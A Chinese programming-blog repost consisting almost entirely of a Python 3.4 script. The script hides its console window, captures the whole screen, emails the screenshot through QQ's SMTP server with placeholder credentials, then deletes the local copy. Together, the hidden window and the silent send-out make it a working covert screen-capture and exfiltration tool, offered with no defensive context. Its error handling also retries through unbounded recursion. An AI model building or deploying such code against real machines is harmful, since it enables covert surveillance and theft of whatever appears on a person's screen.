首页 > 编程语言 > 详细

Python3.4 截屏并将图片发至邮箱

时间:2015-03-28 08:53:57      阅读:428      评论:0      收藏:0      [点我收藏+]
from PIL import ImageGrab
import ctypes
import time
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.image import MIMEImage
import smtplib
import os
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
    ctypes.windll.user32.ShowWindow(whnd, 0)
    ctypes.windll.kernel32.CloseHandle(whnd)
def sendfiles():
    try:
        user = '********@qq.com'
        pwd = '********'
        to = ['******@qq.com']
        msgRoot = MIMEMultipart('related')
        msgRoot['Subject'] = '截图'
        msgText = MIMEText(
            '''<b> Some <i> HTML </i> text </b > and an image.<img alt="" src="cid:image1"/>good!''', 'html', 'utf-8')
        msgRoot.attach(msgText)
        fp = open('./abc.bmp', 'rb')
        msgImage = MIMEImage(fp.read())
        fp.close()
        msgImage.add_header('Content-ID', '<image1>')
        msgRoot.attach(msgImage)
        s = smtplib.SMTP('smtp.qq.com')
        s.login(user, pwd)
        s.sendmail(user, to, msgRoot.as_string())
        print('发送成功')
        s.close()
    except:
        sendfiles()
img = ImageGrab.grab()
img.save('./abc.bmp')
sendfiles()
os.remove('./abc.bmp')
time.sleep(180)

Python3.4 截屏并将图片发至邮箱

原文:http://blog.csdn.net/u013511642/article/details/44683543

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!